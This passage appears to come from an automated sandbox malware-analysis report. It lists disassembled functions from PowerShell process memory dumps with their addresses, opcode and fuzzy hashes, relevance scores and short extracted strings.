                                                                                • Source File: 00000002.00000002.2511068640.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ffd9ba00000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c5a3bdb9e3c7469313b26575d8a23316a1faa82ef2d22583ab76ed10034f8e3d
                                                                                • Instruction ID: 0eba1d05698fd1e245aef3c7b530cd3166886e04c69593ae42f41a4cbd4d2b93
                                                                                • Opcode Fuzzy Hash: c5a3bdb9e3c7469313b26575d8a23316a1faa82ef2d22583ab76ed10034f8e3d
                                                                                • Instruction Fuzzy Hash: 36F1C431A09A4E8FEBA8DF28C8557F977D1FF55310F04426AE88EC7295CF7499418B82
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFD9BA0DC82 Relevance: .5, Instructions: 456COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2511068640.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ffd9ba00000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e4eeb1fb3b2697172b9628631ef04354273bc02e630188306613ef20ff4cf483
                                                                                • Instruction ID: 1c2c252f80f2e66417c1177453eb2162ea22d708de79a4b36cfe63e265d30459
                                                                                • Opcode Fuzzy Hash: e4eeb1fb3b2697172b9628631ef04354273bc02e630188306613ef20ff4cf483
                                                                                • Instruction Fuzzy Hash: 9DE1E630A09A4E8FEBA8DF28C8657F977D1FF65310F14426ED88DC72A5CE7499448B81
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFD9BAD9CC9 Relevance: .5, Instructions: 486COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2511859575.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ffd9bad0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 996706999bde4900b02c33b573026803b2f48e6a09007e53aeff16abee3d7af6
                                                                                • Instruction ID: bc464aa1087a8e13f434fd3ea7c6de94b2ff126f32e56d489be10765f00ab4ab
                                                                                • Opcode Fuzzy Hash: 996706999bde4900b02c33b573026803b2f48e6a09007e53aeff16abee3d7af6
                                                                                • Instruction Fuzzy Hash: 8FE11A32B0FB8E0FEBA5DB6988785A47BD1EF95314B0902BED45DC31E3DA58E9058341
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFD9BAD4B35 Relevance: .4, Instructions: 446COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2511859575.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ffd9bad0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a748b80234e6e39c2c4a2cbe0feb861e78b1cdd9592756dca3578fb966a7de18
                                                                                • Instruction ID: d45902f7dfc9c661c01ab6684be382e9dfeb206a3cd0604fdc73e3e7c40d165d
                                                                                • Opcode Fuzzy Hash: a748b80234e6e39c2c4a2cbe0feb861e78b1cdd9592756dca3578fb966a7de18
                                                                                • Instruction Fuzzy Hash: E1D13922A0FACE0FEB669B6848655B57BA0EF96314B0902FED09DC70F3DD58AD05C351
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFD9BAD9E67 Relevance: .2, Instructions: 159COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2511859575.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ffd9bad0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 47d4b2f179a6a3dc7f560ac1a275480dfbdbb695a7d7bc02d65bc527d14ae04e
                                                                                • Instruction ID: 3264593c4e4200c4a0447c895787df716f764f4ac66682582781b5e2d4b5f071
                                                                                • Opcode Fuzzy Hash: 47d4b2f179a6a3dc7f560ac1a275480dfbdbb695a7d7bc02d65bc527d14ae04e
                                                                                • Instruction Fuzzy Hash: E0512622F1FB8E0FE7A5ABA948785B466D1EFD5250B4A02BED45CC31E3DD19EC088301
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFD9BA03945 Relevance: .0, Instructions: 49COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2511068640.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ffd9ba00000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                • Instruction ID: b220a1cc0a0b9230a0975922b247239f4a2cfb504a8173b9b706129d74a91d6d
                                                                                • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                • Instruction Fuzzy Hash: FD01677121CB0C4FD748EF0CE451AA5B7E0FB99364F10056DE58AC36A5D736E881CB45
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFD9BAD10F5 Relevance: .0, Instructions: 28COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2511859575.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ffd9bad0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 232cbb18474903e930f1506ea66f2b3fd89c7227566a19e7eaa3c0c4bc45957d
                                                                                • Instruction ID: f58a7357b39866c9c5a0690e339d18000ff2fe49cff9f3729498345ffd6c4578
                                                                                • Opcode Fuzzy Hash: 232cbb18474903e930f1506ea66f2b3fd89c7227566a19e7eaa3c0c4bc45957d
                                                                                • Instruction Fuzzy Hash: 1CE04F3270E6885FDB65EA5CA8124D8B7E0EF8623170501F7E199C7062D615AC558790
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Executed Functions

                                                                                Function 07D28BE0 Relevance: 20.7, Strings: 16, Instructions: 735COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$x.fk$-fk
                                                                                • API String ID: 0-198655135
                                                                                • Opcode ID: df84e4609170ccb340bd266df62fd646fa75d04188a6735836c89936aaf87fcf
                                                                                • Instruction ID: 951283956ed31ae7f26fe56e0327f4f6d5db1522eb5dd60d42b5bb5e5ba98fbf
                                                                                • Opcode Fuzzy Hash: df84e4609170ccb340bd266df62fd646fa75d04188a6735836c89936aaf87fcf
                                                                                • Instruction Fuzzy Hash: 8B6290B0A00219CFDB24CF58C950B6AFBB2AF95304F1484A9D509AF355CB32ED87DB91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 07D27978 Relevance: 10.7, Strings: 8, Instructions: 741COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful
                                                                                • API String ID: 0-2454659252
                                                                                • Opcode ID: 9665595aee3c8758970d355a1959d2e940de064a65f55a4b1cfa92a730cad0bf
                                                                                • Instruction ID: c5a811efb430a823895a6b0cd7c5b96261a2c25ae88f4710209366c48693fdaf
                                                                                • Opcode Fuzzy Hash: 9665595aee3c8758970d355a1959d2e940de064a65f55a4b1cfa92a730cad0bf
                                                                                • Instruction Fuzzy Hash: 726259B4B00219CFCB54DF98CA41A5AFBB2AF94318F14C069D9099F365CB72EC46DB91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 07D2A020 Relevance: 10.3, Strings: 8, Instructions: 339COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$x.fk$-fk
                                                                                • API String ID: 0-3003281799
                                                                                • Opcode ID: f3f390f617263e9ca3174d306a72dd70daa2ec352cb942471c049af5818eb230
                                                                                • Instruction ID: 0264e7b4adb8fba754170c8edeab42eb92205768107ce86e653a23927d2c6cee
                                                                                • Opcode Fuzzy Hash: f3f390f617263e9ca3174d306a72dd70daa2ec352cb942471c049af5818eb230
                                                                                • Instruction Fuzzy Hash: E3D16DB0B402199FCB14DF68C551B9EBBA2EBD4308F14C469D9016F3A5CF76EC868B91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 07D2925B Relevance: 9.1, Strings: 7, Instructions: 387COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (ful$(ful$4'^q$4'^q$x.fk$x.fk$-fk
                                                                                • API String ID: 0-665962619
                                                                                • Opcode ID: 014418b2788f57de56c6aa0f87b1d032aec62312699b43e4f230d07fb4c52b35
                                                                                • Instruction ID: d4016549e516fe9099b34e511bdce8a68dd754e7ca29a87919aed7e5d56eec56
                                                                                • Opcode Fuzzy Hash: 014418b2788f57de56c6aa0f87b1d032aec62312699b43e4f230d07fb4c52b35
                                                                                • Instruction Fuzzy Hash: D9F193B0B402159FDB64DF28C950F5ABBB3AF84304F1084A9D509AF795CF72ED868B91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 07D2A01F Relevance: 6.5, Strings: 5, Instructions: 258COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'^q$4'^q$4'^q$x.fk$-fk
                                                                                • API String ID: 0-1095101070
                                                                                • Opcode ID: 6b7ad7afb97e801810f8729250edc758709b7e968a37854db7550a6080dcf9f6
                                                                                • Instruction ID: 4dc05f9835910fd74b5efe79f15f2ed2b1ce4d5cca9768d42c221ab99b4650f9
                                                                                • Opcode Fuzzy Hash: 6b7ad7afb97e801810f8729250edc758709b7e968a37854db7550a6080dcf9f6
                                                                                • Instruction Fuzzy Hash: E0A17BB0A002159FCB14CF68C540B9EFBB2EB98308F14C169D9016F3A5CB76EC879B91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 07D25FC0 Relevance: 6.4, Strings: 5, Instructions: 184COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                • API String ID: 0-3272787073
                                                                                • Opcode ID: 022b5a57c71df5a020bbbd88cdfd9b0d0495193bdbd29f30c15000f88c133d14
                                                                                • Instruction ID: 0637f33ce4595b79894f6c99de320aef7f915d3b8d8f3f811793d90b20815e9a
                                                                                • Opcode Fuzzy Hash: 022b5a57c71df5a020bbbd88cdfd9b0d0495193bdbd29f30c15000f88c133d14
                                                                                • Instruction Fuzzy Hash: 8C515A707043559FCB168B28C915B6AFFB19F92314F1480ABD4449F693CB32D857E7A2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 07D27977 Relevance: 4.3, Strings: 3, Instructions: 542COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (ful$(ful$(ful
                                                                                • API String ID: 0-3290164086
                                                                                • Opcode ID: 7fdf96e0a3c46e2f97e1066feb3f4b5bc674a1ea45429631543e1c58c7d2aeb4
                                                                                • Instruction ID: 874f78efe8e1fb0070c446349ecf6211d9fb967a6d710969670b51d8bd8f1d30
                                                                                • Opcode Fuzzy Hash: 7fdf96e0a3c46e2f97e1066feb3f4b5bc674a1ea45429631543e1c58c7d2aeb4
                                                                                • Instruction Fuzzy Hash: 3D3247B4A002159FCB64CF98C941E99FBB2BF94328F14C099DA099F365CB72EC46DB51
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 07D280ED Relevance: 4.2, Strings: 3, Instructions: 483COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (ful$(ful$(ful
                                                                                • API String ID: 0-3290164086
                                                                                • Opcode ID: aff3d542418ef2fdc031de328dd2a626746fb3016dd38a82bb17d5d53a3c7c32
                                                                                • Instruction ID: 88781f58c08bb6e80471a314359445be1b6c9ffb9533583734ee86371aa2048b
                                                                                • Opcode Fuzzy Hash: aff3d542418ef2fdc031de328dd2a626746fb3016dd38a82bb17d5d53a3c7c32
                                                                                • Instruction Fuzzy Hash: 3C1236B4A00215DFCB64CF98C941AA9FBB2BF94318F14C099DA059F365CB72EC46EB51
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 07D20748 Relevance: 4.0, Strings: 3, Instructions: 253COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'^q$4'^q$$^q
                                                                                • API String ID: 0-953868773
                                                                                • Opcode ID: 4673f7f6762b4c154e441ddaeeba03c6412ffbad2655f3f6c5deebcc0563412a
                                                                                • Instruction ID: c6f16bf820f8b0e61072a0a2946717a9dc78b2fa772b89118ce0277aa088dd10
                                                                                • Opcode Fuzzy Hash: 4673f7f6762b4c154e441ddaeeba03c6412ffbad2655f3f6c5deebcc0563412a
                                                                                • Instruction Fuzzy Hash: 468139B2B0022A8FDB145B68990067BFBA6AFA5218F18847AD445CB251DE31C953D7A2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 07D284A0 Relevance: 4.0, Strings: 3, Instructions: 247COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (ful$(ful$x.fk
                                                                                • API String ID: 0-2383735965
                                                                                • Opcode ID: 9bda31955e3d07b9579768d4de49ce5bf0f2182a4341627c61c9648eb750c80b
                                                                                • Instruction ID: 4fe3740242a8dcc8b090f9c98f084a5da238c688a8408d10ac9eb5f5c6cbad7c
                                                                                • Opcode Fuzzy Hash: 9bda31955e3d07b9579768d4de49ce5bf0f2182a4341627c61c9648eb750c80b
                                                                                • Instruction Fuzzy Hash: 4891B0F4B002149FD744DB68C945FAEBBE3AB98308F508068D505AF795CB72EC529B91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 07D20638 Relevance: 3.9, Strings: 3, Instructions: 110COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $^q$$^q$$^q
                                                                                • API String ID: 0-831282457
                                                                                • Opcode ID: a3ca15334894d340de96ad39420bfc75e8b5088672a5af11fb6b232fe85be357
                                                                                • Instruction ID: 703740f74b201a95f10aca406512b2f0c5bac21306b6d059e839994e9086e3fb
                                                                                • Opcode Fuzzy Hash: a3ca15334894d340de96ad39420bfc75e8b5088672a5af11fb6b232fe85be357
                                                                                • Instruction Fuzzy Hash: F43149B1704226CFD7189B59D844A76F7A2EFE121DB28C02ED5458F251DE33C807D754
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 07D2849F Relevance: 2.7, Strings: 2, Instructions: 219COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (ful$x.fk
                                                                                • API String ID: 0-1226617640
                                                                                • Opcode ID: b4e9287ef44d4ce27bf2d3725aa33d85858160716b5a1e3da0e0b7f35e6ba9f9
                                                                                • Instruction ID: 72ea77a0e57d2d9ec000f957cd68650eadfee13b12de65c4c0c1152e1cbd184b
                                                                                • Opcode Fuzzy Hash: b4e9287ef44d4ce27bf2d3725aa33d85858160716b5a1e3da0e0b7f35e6ba9f9
                                                                                • Instruction Fuzzy Hash: AC81AEF4A002149FD714DB58C545FAEB7E2AB98308F508069E5016F7A5CB72EC92EB91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 07D20747 Relevance: 2.6, Strings: 2, Instructions: 65COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'^q$$^q
                                                                                • API String ID: 0-432994343
                                                                                • Opcode ID: a80fad020b3607fd1f7c2de5f095dd1df2cf51edc6cd350d8c784d992ddd74f9
                                                                                • Instruction ID: a510afbec08230ba0aa92b03cd070bb18236d46a4cff24e3c3526c267f3080bf
                                                                                • Opcode Fuzzy Hash: a80fad020b3607fd1f7c2de5f095dd1df2cf51edc6cd350d8c784d992ddd74f9
                                                                                • Instruction Fuzzy Hash: A911B1F1E00226DFCB20AE158501A7AF7E1EF64258F05807AD9449B201DB30C893EBE1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 07D20637 Relevance: 2.6, Strings: 2, Instructions: 52COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $^q$$^q
                                                                                • API String ID: 0-355816377
                                                                                • Opcode ID: cb6a59499a14cc20131aab920c36e22ec4cf931f92acd8c8eed7689d3bd0ef47
                                                                                • Instruction ID: 38430f22b7891134d87394af7bad51bfafb9473adbac314f7f51eeebaad5beb2
                                                                                • Opcode Fuzzy Hash: cb6a59499a14cc20131aab920c36e22ec4cf931f92acd8c8eed7689d3bd0ef47
                                                                                • Instruction Fuzzy Hash: CB01C4B5700226DFD7248A04C844E72F7B5EBE121AF18802AD9044F251DB32D807DB58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 07D2A446 Relevance: 1.4, Strings: 1, Instructions: 102COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: x.fk
                                                                                • API String ID: 0-1423657076
                                                                                • Opcode ID: e519177fe236559bb4f41ee91f7bae27bd6bcdd09b1b68ca5c664cc580bc9868
                                                                                • Instruction ID: 0cb0046629e0aa5ca29093d50ba348b76b2b8b814ab76ad80e733dbc091b74d8
                                                                                • Opcode Fuzzy Hash: e519177fe236559bb4f41ee91f7bae27bd6bcdd09b1b68ca5c664cc580bc9868
                                                                                • Instruction Fuzzy Hash: 8231A5B4B402149FD7149B68C951FAFBBA3EB84344F10C464E9016F7A5CF76EC468B91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 07D208D8 Relevance: .1, Instructions: 104COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b25ae8f10891ef4bfc7173ec1062ec64bf43461bcdcb96a236a5a2fdaa6a497f
                                                                                • Instruction ID: 6e8d564b87d9481493e9953f67ef121bdb7ced6f584268f37af870e262d2b190
                                                                                • Opcode Fuzzy Hash: b25ae8f10891ef4bfc7173ec1062ec64bf43461bcdcb96a236a5a2fdaa6a497f
                                                                                • Instruction Fuzzy Hash: 14314CF55043298FDB108F29C940766FBB5AF95254F2C40A6D445CB2A2C734C947D7A1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 07D22CD4 Relevance: .1, Instructions: 101COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 395fd56e97a928efb4cb2754ebebe069f9abac33faa38b445b72e8c87b49f490
                                                                                • Instruction ID: eaa737f38a52bdbba300ffc30a24d60bccc25569f4077583acee613f17954dd1
                                                                                • Opcode Fuzzy Hash: 395fd56e97a928efb4cb2754ebebe069f9abac33faa38b445b72e8c87b49f490
                                                                                • Instruction Fuzzy Hash: 46315AF37001348BC71067689811AAFF752AFE4328B15C0AAD6419F365CE76ED5393E2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 07D208D7 Relevance: .1, Instructions: 85COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d9b8c51870baf01903ed3b859159ff130de9b08b96385fcf1910863a9eecccc0
                                                                                • Instruction ID: 6a9972ae4490b258dbe2f206d827823032b8b666be9d658950e3f338ff7e64c9
                                                                                • Opcode Fuzzy Hash: d9b8c51870baf01903ed3b859159ff130de9b08b96385fcf1910863a9eecccc0
                                                                                • Instruction Fuzzy Hash: C2210CF5A00229DFDB108F29C540776FBE9AFA4344F688066D8058B255CB31C983D7A1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 07D26327 Relevance: .1, Instructions: 66COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4fcd866ca41378eb9de2368477fbd293e67e506935ad4de64a0868e530546ec9
                                                                                • Instruction ID: d6e9cacfdef1db27b06b38b5b3bdc16a9b4bde3a32cd62445e5288403f255d36
                                                                                • Opcode Fuzzy Hash: 4fcd866ca41378eb9de2368477fbd293e67e506935ad4de64a0868e530546ec9
                                                                                • Instruction Fuzzy Hash: 4C11817510E3E19FC723972898A6596FF709E5310971D90CBD0948F4A3D614D94BD3A2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Non-executed Functions

                                                                                Function 07D28A88 Relevance: 2.6, Strings: 2, Instructions: 117COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: tP^q$tP^q
                                                                                • API String ID: 0-309238000
                                                                                • Opcode ID: 9e7fa2ea8b87ee07800ee1e83107a42f901a0d6c8c452b65e92109fd813c6246
                                                                                • Instruction ID: 97f637e71b9ba4ef5b8692f3c769bc8a765ff0a2f3debd302f88fabf3af70e28
                                                                                • Opcode Fuzzy Hash: 9e7fa2ea8b87ee07800ee1e83107a42f901a0d6c8c452b65e92109fd813c6246
                                                                                • Instruction Fuzzy Hash: 624159F1B003259FCB608A688845B67FFA2AF91314F0884AAD5099F291DA31D843E3D2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 07D22668 Relevance: 14.2, Strings: 11, Instructions: 433COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$kl$kl
                                                                                • API String ID: 0-3368483837
                                                                                • Opcode ID: aaf63cc2bfdc63f113efcab2d8d38e4f69aab9a7d39fecbf358231ce4de085b7
